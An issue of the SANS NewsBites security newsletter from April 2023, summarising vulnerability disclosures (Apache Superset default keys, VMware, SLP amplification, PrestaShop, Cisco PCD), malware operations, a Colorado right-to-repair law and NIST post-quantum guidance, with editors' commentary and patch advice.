NewsBites Volume XXV – Issue 34

Top of the News

2023-04-26

Apache Superset Misconfiguration Allows Remote Code Execution

An unsecure default configuration in Apache Superset in versions shipping prior to April 5, 2023 could be exploited to obtain admin access to the data visualization and exploration tool and harvest credentials, compromise data, and remotely execute code. The issue exists in Apache Superset up through version 2.0.1. Users are urged to update to Apache Superset version 2.1 or later.

Editor's Note

[Ullrich] On the one hand, users should read the manual, but on the other hand, software should not assume they actually do. If you add a default cryptographic key (or password) to your software's configuration at least display an error message and do not allow the software to run unless the key is changed.

Johannes Ullrich

Let’s break this down: This was a lab in the Advanced Web Pen Testing Course I authored many years ago. The bug here stems from how cookies are securely wrapped within the application. Since the encryption key is well known, and the attacker understands the algorithm to unwrap the cookie, the encryption is rendered ineffective as it just requires someone to look. These bugs are nasty because it's more than just resetting a user’s password; it has to do with rotating the application secret, which is the crux of this issue. Does this impact more than Apache Superset? Potentially, this bug affected Python Flask (in this case, being the target) and Ruby Sinatra. The advice given to most “developers” is “choose a strong key”; however, most developers that are building Flask applications should have this defaulted to a randomly generated long string. I advise many developers in this setting that “opinionated frameworks” can set safe defaults, while these microservices frameworks may not. This is the risk model you must assume.

Moses Frost

This is the challenge of a functional default configuration. Ideally, security items that you're supposed to provide your own value for should be commented out, with a note about setting a value. Not only does version 2.1 fix the bug, but also will not start if you're using one of the default keys. If you're using a default key, you will not only need to generate a new secure one, but also the information secured with the old one will need to be re-encrypted. Apache Superset CLI includes a tool for rotating secrets -see the Superset SECRET_KEY Rotation page. https://superset.apache.org/docs/installation/configuring-superset/#secret_key-rotation

Lee Neely

Default configuration is a delicate balance between user experience and security. The vendor too often tips the scale to user experience. There exists a marketplace that offers secure configuration recommendations for a variety of vendor products (CIS Benchmarks, DISA STIGs). In this case, the only alternative is to update to the latest version. Here’s a gentle reminder to build into your cybersecurity program, secure configuration.

Curtis Dukes

Google Authenticator Revamp Includes Account Synchronization (But No E2EE Yet)

Google Authenticator now lets users sync their sign-in codes to their Google Accounts and other devices. This will prevent users from being locked out of their accounts if a device is lost or stolen. The synced sign-in codes are not protected by end-to-end encryption (E2EE), which would allow someone who accessed your Google Account to see all 2FA secrets. Google plans to add E2EE to Google Authenticator at some point in the future.

Malware Delivered Through Legitimate Update Channels

An advanced persistent threat (APT) threat actor with ties to China has been delivering malware to an international non-governmental organization (NGO) via legitimate software update channels. Researchers from ESET “discovered that when performing automated updates, a legitimate application software component downloaded MgBot backdoor installers from legitimate URLs and IP addresses.” The researchers believe the infection was carried out either as a supply chain attack or as an adversary-in-the-middle attack.

RSA 2023: SANS Briefing on Five Most Dangerous New Attack Techniques

On Wednesday. April 26, SANS instructors and faculty members Katie Nickels, Johannes Ullrich, Stephen Sims, and Heather Mahalik took the stage at an RSA Conference keynote titled The Five Most Dangerous New Attack Techniques. Watch SANS Technology Institute College President Ed Skoudis's preview of the keynote session at the top link below.

The Rest of the Week's News

2023-04-27

Agricultural Equipment Right-to-Repair Becomes Law in Colorado

Colorado Governor Jared Polis has signed into law a bill that will allow owners of agricultural equipment owners the right to repair their own machines. The law will take effect January 1, 2024. Colorado has an existing right-to-repair law that gives powered wheelchair owners the right to repair their devices. Legislatures in ten other US states are considering similar agricultural right-to-repair bills.

Editor's Note

From an overall economic point of view, it makes sense to make sure product manufacturers can’t unfairly profit over needed repairs or upgrades to their products that include software. But, from a security perspective it means instead of one definitive source for updates, there will be many – which of course enables criminals to supply malicious updates/”features” that will turn a tractor into a brick until the ransom is paid. Supply chain security is hard enough; this enlarges the number of potential software suppliers. Security evaluation criteria will have to be in every procurement of third-party software updates and services. See this week’s item on Chinese attacks compromising legitimate software updates.

John Pescatore

I’m of two minds on the ‘Right-to-Repair’ law. Yes, it’s a good thing purely from an economics viewpoint. It is also likely to reduce the monopoly on equipment repair that farm equipment vendors currently enjoy. However, from a security perspective, it opens up a raft of potential localized supply chain attacks by evil-doers. Given that many other states are considering similar bills, security guidance to shore up supply chains becomes increasingly important.

Curtis Dukes

This bill initially applied to powered wheelchairs and was extended to include agricultural equipment. Given the duty cycle of that equipment, and the complexity - more like a jet plane than that tractor on Green Acres, being able to get parts and effect repairs is a 24x7 problem during peak seasons, such as harvest, and making repairs difficult can have a direct impact on consumers due to lost/ruined crops or excessive costs. Farmers will still have the choice to go to the OEM for repair services, and I am sure will run into less-than-ideal third-party options. On the cool side, this legitimizes hacks developed in the field. John Deere is known for incorporating these into future products after discovering them in the field.

Lee Neely

My dad was a mechanic, and I grew up working on cars; it dumbfounds me that someone who purchased a piece of equipment here was treated as a software licensee. Please make no mistake; the automotive business was mostly about selling parts than it was about selling cars. I can’t imagine working on a car today; like Darth Vader, a car is more computer than mechanical. Unfortunately, the large machine agricultural market is almost a monopoly at this point, and if you are in that business, you are beholden to whom you can purchase a tractor. Unfortunately, you have even to have a law like this in the books, but this is where we are. Instead of this law, we saw small farms backdooring their machinery, which was less than ideal for repairing their machinery. Let’s hope that the manufacturers allow for fewer restrictions in the future. However, I think that since many of us are moving away from combustion engines into less “maintenance” and “less profitable parts sales” electric vehicles, we may also start to see more and more restrictions on our regular vehicles.

Moses Frost

The IT market clearly prefers open systems. Only a few of us prefer the confidence that comes with closed systems. My iPhone and iPad rarely need repair and when they do I will continue to take them to the Apple Store. Not sure what I might do with a farmer's robot where the difference between the cost of "authorized" repairs and others might be material.

William Hugh Murray

NIST Taking Comments on Draft Guidance on Post-Quantum Cryptography

The US National Institute of Standards and Technology (NIST) has published a preliminary draft of its Special Publication 1800-38A, Migration to Post-Quantum Cryptography. The guide is intended to help organizations identify where and how public-key algorithms are being used on their systems; provide tools, guidelines, and practices to plan replacements and updates for hardware, software, and services that use quantum-vulnerable public-key algorithms; and develop a playbook for migration. The guide also offers tools for product and service providers. NIST will accept comments on the document through June 8, 2023.

Google Obtains Takedown Order for CryptBot Malware Operation

Google has obtained a court order that allowed the company to take down infrastructure supporting the CryptBot malware operation. CryptBot has infected an estimated 670,000 computers over the past year and has been used to steal data form Google Chrome users. The order allows Google to take down domains of CryptBot distributors both now and in the future.

VMware Updates for Workstation and Fusion

VMware has released updates to address four vulnerabilities in their Workstation and Fusion software hypervisors. One of the flaws, a stack-based buffer-overflow vulnerability in Bluetooth device-sharing functionality, is rated critical. The other three – an information disclosure vulnerability in Bluetooth device-sharing functionality, a VMware Fusion Raw Disk local privilege escalation vulnerability, and an out-of-bounds read/write vulnerability – are rated important.

SLP Vulnerability Can Be Exploited to Launch Reflective Amplification DDoS Attacks

A vulnerability in the Service Location Protocol (SLP) could be exploited to amplify distributed denial-of-service (DDoS) attacks by a factor of 2,200. SLP “allows an unauthenticated remote attacker to register arbitrary services [and] use spoofed UDP traffic to conduct a denial-of-service (DoS) attack with a significant amplification factor.” SLP is a network discovery protocol developed more than 25 years ago. While it was not intended to be publicly available to the Internet, researchers from Bitsight and Curesec found more than 54,000 instances available online. The issue affects all SLP implementations. The researchers’ blog post offers suggested mitigations.

PrestaShop Update Fixes Critical SQL Filtering Vulnerability

The PrestaShop e-commerce platform has released an update to address a critical vulnerability that allows all backend users to “write, update and delete in the database, even without having specific rights.” The SQL filtering vulnerability is fixed in PrestaShop versions 8.0.4 and 1.7.8.9.

Cisco Working on Fix for Zero-day in Prime Collaboration Deployment Tool

Cisco has disclosed a zero-day vulnerability in its Prime Collaboration Deployment (PCD) software that could be exploited to execute code remotely or steal sensitive data. Cisco is developing a patch for the vulnerability; there are currently no workarounds.